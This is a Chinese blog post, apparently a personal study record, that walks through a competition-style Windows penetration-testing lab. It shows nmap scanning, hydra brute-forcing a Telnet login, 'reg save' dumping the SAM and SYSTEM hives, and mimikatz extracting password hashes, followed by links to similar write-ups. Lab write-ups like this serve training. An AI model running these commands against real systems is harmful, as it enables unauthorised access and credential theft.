Windows操作系统渗透测试

已于 2025-04-22 17:25:16 修改
阅读量1.4k 收藏 32
点赞数 22
分类专栏: 赛题综合 文章标签: windows 网络安全 web安全 系统安全
于 2024-06-11 18:33:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wdnmddbl/article/details/139605626
版权

个人学习记录

赛题综合练习

文章目录

前言

路漫漫其修远兮,吾将上下而求索。
文章涉及命令和思路在总结

一、解题过程

1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;

nmap -sV -A -p- 192.168.66.79

在这里插入图片描述flag:{232}

2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)

hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://192.168.66.79:232 -vV

在这里插入图片描述flag:{hydral -l -P}

3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)

在这里插入图片描述
flag{customer}

4.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;

在这里插入图片描述
flag{reg save HKLM\SAM C:/sam.hive}

5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;

在这里插入图片描述

6.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;

先把提取的文件共享,如下图所示:
在这里插入图片描述然后连接teltest,把文件下载到本地,如下图所示:
在这里插入图片描述
在这里插入图片描述
使用mimikatz工具提取teltest密码信息,如下图所示:

在这里插入图片描述flag{lsadump::sam /sam:C:\sam.hive /system:C\system.hive}

总结

大概思路和涉及的知识点
nmap -sV -A -p- 是一个在命令行中使用的命令,它使用Nmap(网络映射)工具进行网络扫描。具体来说,‘nmap -sV -A -p-’ 的含义如下:

  • ‘nmap’ 是Nmap工具的命令行接口。

  • ‘-sV’ 选项表示使用 ‘service version’ 扫描,用于检测目标服务器上运行的网络服务及其版本。

  • ‘-A’ 选项表示进行全面扫描,包括系统发现(discovery)和漏洞扫描。

  • ‘-p-’ 表示扫描所有未指定的端口(即,所有在1-65535之间的端口)。

总的来说,这个命令的意思是使用Nmap工具对目标服务器进行全面扫描,包括检测服务版本、发现系统信息并扫描可能的漏洞,同时扫描所有在1-65535之间的端口。

hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://192.168.66.79:232 -vV
-l :指定破解的用户,对特定用户破解
-P 大写,指定密码字典
-vV 显示详细信息

在这里插入图片描述

思路:
nmap扫描,启用文件共享,远程连接telnet用户,hydra工具的使用,mimikatz工具的使用,学习以上知识点即可。

中职网络安全技能大赛-Windows操作系统渗透测试
Jay
04-02 3372
Windows操作系统渗透测试 第一步,打开网络拓扑,点击启动选项,启动实验虚拟机 第二步,使用ifconfig或ipconfig命令获取地址 确认渗透机ip地址:172.16.1.100 确认靶机ip地址:172.16.1.200 1.通过本地PC中渗透测试平台Kali2.0对服务器场景p100_win03-22进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为Flag值提交; 进入kali命令控制台中使用nmap工具 Flag:Microso
Windows渗透测试
Dark0518的博客
11-15 4383
接上文,上一篇文章,我们了解了软件渗透测试的相关入门基础,那这篇文章我们就来聊聊对于Windows渗透测试吧 首先,还是我们的开头三问:是什么、为什么、如何做? Windows服务是什么? 一、什么是windows服务 windows服务的作用: (1)服务决定了计算机的一些功能是否被启用 (2)不同的服务对应的功能不同 (3)通过计算机提供的服务可以有效实现资源共享 常见的服务: web服务、dns服务、dhcp服务、邮件服务、telnet服务、ssh服务、smb服务 二、端口(1)端口分
windows渗透测试
Aluxian_的博客
05-25 9609
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测
kali利用msf渗透Windows电脑测试
最新发布
2403_90011488的博客
03-28 978
MSF集成了数千个已知的软件漏洞利用模块,支持针对不同平台(如Windows、Linux)和服务(如SMB)的漏洞攻击。例如,著名的永恒之蓝漏洞 (MS17_010)就是通过MSF进行利用的。
B-1:Windows操作系统渗透测试
m0_45155797的博客
04-16 2749
B-1:Windows操作系统渗透测试 服务器场景:Server2003 服务器场景操作系统Windows7 1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交; 2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s
渗透测试——Windows基础(全)
2302_80296003的博客
12-09 1658
copy 1.txt desktop\2.txt(把admin文件中的1.txt复制到桌面并重命名为2.txt)move ..\1.txt 4.txt (把上一级目录中的1.txt移动到副本级目录 并且重命名到4.txt)把1.txt的内容和2.txt的内容拼接起来 并重定向到3.txt并改名为3.txt。del 1.txt 2.txt 3.txt(删除1.txt 2.txt 3.txt)copy 1.txt ..\1.txt(把文件1.txt复制到上级文件)
中职网络空间安全Windows操作系统渗透测试解题
06-05
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理...通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。
E120-经典赛题-Windows操作系统渗透测试.pdf
01-13
Prac9经典赛题 Windwos 操作系统渗透测试
05Windows操作系统渗透测试.doc
12-02
05Windows操作系统渗透测试
P10-经典赛题-Windows操作系统渗透测试.docx
03-29
中职网络安全赛题解析,Windows操作系统渗透测试解析,P系列资料。
网络安全B模块(笔记详解)- Windows操作系统渗透测试
weixin_57536426的博客
12-24 1268
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
推荐 3 款基于Windows 封装的渗透测试系统
gandli的博客
11-30 1771
Windows11 Penetration Suite Toolkit 一个开箱即用的windows渗透测试环境新增内网渗透工具和远程管理工具、删除了部分已不再维护或基本不用的工具Windows11 Penetration Suite Toolkit v2.2 (WSL) 【推荐】Windows11 Penetration Suite Toolkit v2.2 (NoWSL) 【无WSL】
Server2003——Windows操作系统渗透测试
2202_75858632的博客
01-28 579
任务环境说明:服务器场景:Server2003(开放链接)服务器场景操作系统Windows7 1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;Flag:2322.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -
windows渗透测试入门
Han_V_Qin的博客
11-10 631
一、windows服务     windows服务的作用:         服务决定了计算机的一些功能是否被启用         不同的服务对应的功能不同         通过计算机提供的服务可以有效实现资源共享       常见的服务:         web服务、dns服务、dhcp服务、邮件服务、telnet服务、ssh服务、smb服务   二、端口     1、端口分为著名端口和动态端口两种         知名端口即众所周知的端口号,范围从0到1023,这些端口号一般固定分配给
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1060
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
渗透测试学习1--Windows
qq_37382081的博客
05-10 538
一些Dos命令:net use k:\\(对方的ip地址)\c$将对方的C盘复制到本地取名为knet use k:\\(ip地址)\c$/del删除k盘简单的整人代码:shutdown -s -t 60 -c"hacked by Remiliia"弹出对话框,显示引号里面的内容,并且与60秒后关机,如果是重启将-s 改为 -rnet start XX  开启XX服务net stop XX  停止X...
5.windows渗透测试环境
07-09 320
windows7 渗透工具包 win10也可以 bin文件夹里面是这个渗透工具包里面所包含的工具 里面的burp不是破解版的,可以更换为破解版的 sqlmap,大鲨鱼抓包工具都有 输入名称,工具就可以调用了 命令:list webapplication 查看工具包中所有工具 需要什么,安...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值